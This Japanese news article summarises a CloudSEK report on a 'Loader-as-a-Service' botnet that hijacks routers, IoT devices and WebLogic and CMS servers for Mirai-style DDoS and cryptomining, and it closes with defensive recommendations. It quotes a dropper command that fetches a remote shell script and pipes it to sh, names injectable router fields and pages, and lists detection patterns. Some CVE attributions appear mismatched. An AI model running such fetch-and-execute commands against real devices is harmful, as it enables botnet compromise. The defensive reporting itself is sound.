サイバーニュース.jp

世界のサイバーなニュースを配信

新ボットネット「Loader-as-a-Service」が家庭用ルーターとIoTをMiraiファームに変える

カテゴリ:

, , , , , , , , ,

概要:新たな「Loader-as-a-Service」ボットネットの脅威

CloudSEKは、過去6ヶ月間にわたり展開されてきた高度な「Loader-as-a-Service」ボットネットキャンペーンを明らかにしました。このボットネットは、公開されたコマンド&コントロール(C2)ログを悪用し、SOHOルーター、組み込みLinuxデバイス、およびエンタープライズアプリケーションを標的としています。

攻撃者は、NTP、syslog、ホスト名フィールドなどのサニタイズされていないPOSTパラメータ、デフォルトの認証情報、およびWebLogic、WordPress、vBulletinシステムにおける既知のCVE(脆弱性)を悪用して、リモートコード実行を実現しています。2025年7月から8月にかけて、攻撃量は230%も急増し、Morteバイナリやクリプトマイニングペイロードを含むマルチアーキテクチャマルウェアが配布されました。CloudSEKは引き続きこの活動を監視しており、標的となった技術スタックを持つ顧客に警告を発しています。

攻撃の詳細と手口

CloudSEKのTRIADチームは、悪意のあるインフラストラクチャの定常スキャン中にこの作戦を初めて特定しました。サーバーには、過去6ヶ月間にわたって脅威アクターによって発行されたC2ログが含まれており、攻撃ベクトルと使用されているインフラストに関する洞察が得られました。

公開されたコントロールパネルログの調査により、攻撃チェーンの各段階に対応する体系的なモジュールのシーケンスが明らかになりました。角括弧内の主要なログマーカーは、異なる機能を示しています:

  • [ReplyPageLogin]:Web管理インターフェースに対するログイン試行を捕捉し、デフォルト認証情報のプローブとブルートフォース攻撃の両方をログに記録します。認証成功は、その後のインジェクション段階に利用されます。
  • [ConfigSystemCommand]および[SystemCommand]wget -qO- http://IP/rondo.*.sh | sh、busyboxフェッチ、またはTFTP/FTPベースのチェーンなどのインジェクションコマンドを記録し、最小限のドロッパースクリプトの配信を示します。
  • [ReplyErrorPage]および[ReplySuccessPage]:実行の失敗または確認を通知し、オペレーターの再試行ロジックを導いたり、ペイロードステージングのために侵害されたホストを特定したりします。
  • [ReplyDeviceInfo]:侵害後の偵察をログに記録し、MACアドレス、ファームウェアバージョン、到達可能なサービスを収集して、持続的なC2、クリプトマイニング、またはアクセス再販のためのペイロード選択を調整します。

標的と攻撃手法

このキャンペーンは、以下のシステムを体系的に標的としています:

  • Oracle WebLogicサーバー:コンソール/サーブレットRCEを介して。
  • SOHOルーター:脆弱なUIページ(例:wlwps.htm、wan_dyna.html)およびサニタイズされていないフィールド(ntp、remote_syslog、hostname、ping)を介して。
  • 組み込みLinuxデバイス:マルチアーキテクチャバイナリ(morte.x86、morte.x86_64)をドロップして。
  • CMSプラットフォーム:CVE-2019-17574(Popup Maker)、CVE-2019-16759(WordPress)、およびvBulletin CVE-2012-1823を介して。

攻撃者は、デバイスタイプ全体での互換性を最大化するために、HTTP、TFTP、FTPなどの複数のプロトコルとBusyBoxラッパーを使用してペイロードを配信します。デフォルトの認証情報と自動化されたスプレーが初期アクセスを容易にします。多様なIP範囲にわたる冗長なドロップホストは、テイクダウンに対する回復力を保証します。侵害後、オペレーターはJSON-RPCマイナーまたはMiraiスタイルのボットを展開し、乗っ取られたリソースをクリプトマイニングやDDoSキャンペーンに利用します。

影響

このボットネットキャンペーンは、広範な影響を及ぼします:

  • エンタープライズへの標的化:WebLogicのデシリアライゼーション、Struts2 OGNLインジェクション、JNDIエクスプロイトの利用は、データ流出、ネットワーク内での横方向の移動、およびランサムウェアなどの二次ペイロードのリスクを高めます。
  • インフラストラクチャの侵害:企業の境界ルーターは、帯域幅の枯渇、NTPポイズニングによる時間依存システムの混乱、診断インターフェースを介したDNS操作に直面します。
  • サードパーティリスク:中小企業のルーターやIoTデバイスは、エンタープライズクライアントに対する攻撃の足がかりとなり、侵害されたサービスプロバイダーのインフラは攻撃範囲を拡大する可能性があります。

運用上の影響には、ボットネットのリクルートによるネットワークパフォーマンスの低下、多角的な攻撃によるインシデント対応の作業負荷の増加、および多様な表面での脅威ハンティングの需要の増加が含まれます。

推奨事項

この新たな脅威に対抗するため、以下の対策が推奨されます:

出口フィルタリング

  • IoTセグメントからのHTTP、HTTPS、TFTP、FTPのアウトバウンド通信を拒否します。

インベントリと隔離

  • インターネットに公開されている管理UIを特定し、インジェクションされたPOSTパターンを示すデバイスを隔離します。

認証情報とファームウェアの更新

  • 固有の認証情報を強制し、ベンダーパッチを適用し、不要なリモート管理機能を無効にします。

検出(SOC/SIEM)

  • wgetcurl、または|shを含む疑わしいPOSTパラメータを検出するためのSigmaルールを実装します。
  • HTTPボディ内のダウンロードおよび実行パターンに対してSuricata/Snort正規表現アラートを展開します。
  • クリプトマイニング活動を示す異常なJSON-RPCトラフィックを監視します。

予防(ネットワーク/SecOps)

  • ファームウェアとNTPのホワイトリストに登録された更新サーバーのみを許可する厳格な出口フィルタリングを強制します。
  • IoTデバイスと組み込みデバイスをコアプロダクションネットワークからセグメント化します。
  • VPNまたはジャンプボックスアクセスでWeb UIを強化します。

対応(IR)

  • アウトバウンドマイニングまたは予期しない/tmp/morte.*実行を示すデバイスを隔離します。
  • フォレンジックアーティファクト(シェルコマンドログ、プロセスツリー、一時ファイルシステムの内容)を収集します。
  • パッチ適用不可能なデバイスを再イメージングまたは交換して整合性を回復します。

今後の展望

CloudSEKは、この「Loader-as-a-Service」オペレーションが今後も進化し、デバイスの標的化とペイロードの高度化が進むと予測しています。この新たな脅威を軽減するためには、警戒的な監視、迅速な修復、および多層防御戦略が不可欠です。

元記事: https://gbhackers.com/new-botnet-loader-as-a-service-turns-home-routers-and-iot-into-mirai-farms/

投稿をさらに読み込む